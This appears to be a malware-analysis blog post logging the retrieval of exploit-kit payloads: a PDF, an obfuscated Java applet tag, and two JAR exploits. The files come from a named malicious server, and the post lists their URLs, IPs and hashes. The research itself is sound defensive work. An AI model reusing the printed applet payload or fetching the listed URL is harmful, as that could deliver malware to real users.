Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:58 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 9781
Content-Disposition: inline; filename=b76cb.pdf
200 OK
Registered socket 1896 for persistent reuse.
Length: 9,781 (9.6K) [application/pdf]
100%[====================================>] 9,781         59.75K/s
 
 
// And the JAR...
 
// see the applet url...
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>
 
http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:32:09 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 20 [text/html]
100%[====================================>] 20            --.--K/s
22:27:08 (659.56 KB/s) - `column.php@cabimab=lij&ymwbck=rpe.2' saved [20/20]
 
// hmm.. the jar looks failed.. :-( Let's re-set the "request" :
 
 
// retry - try1 (old java version)
 
--16:24:19--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 07:24:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16786
ETag: "e3ffc7e6bc6f654d51dd5bb7658ae853"
Last-Modified: Wed, 16 Jan 2013 07:24:16 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 16,786 (16K) [application/java-archive]
"16:24:21 (26.42 KB/s) - `try1.jar' saved [16786/16786]"
 
// retry - try2 (newer java version)
 
--17:06:01--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 91.224.135.20, 212.112.207.15, 81.31.47.124
Caching dekamerionka.ru => 91.224.135.20 212.112.207.15 81.31.47.124
Connecting to dekamerionka.ru|91.224.135.20|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5b20 (new refcount 1).
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 08:11:06 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22600
ETag: "2af29d21c006b5c106bd7760f19a2bf5"
Last-Modified: Wed, 16 Jan 2013 08:05:58 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,600 (22K) [application/java-archive]
"17:06:03 (42.76 KB/s) - `try2.jar' saved [22600/22600]"
 
// two jars was downloaded successfully
 
bash-2.02$ date
Tue Jan 15 23:14:51  2013
 
2013/01/16  16:24            16,786 tri1.jar
2013/01/16  17:05            22,600 try2.jar
               2 File(s)         39,386 bytes
 
tri1.jar    e3ffc7e6bc6f654d51dd5bb7658ae853
try2.jar    2af29d21c006b5c106bd7760f19a2bf5
 :
#MalwareMustDie!
Subscribe to: Posts (Atom)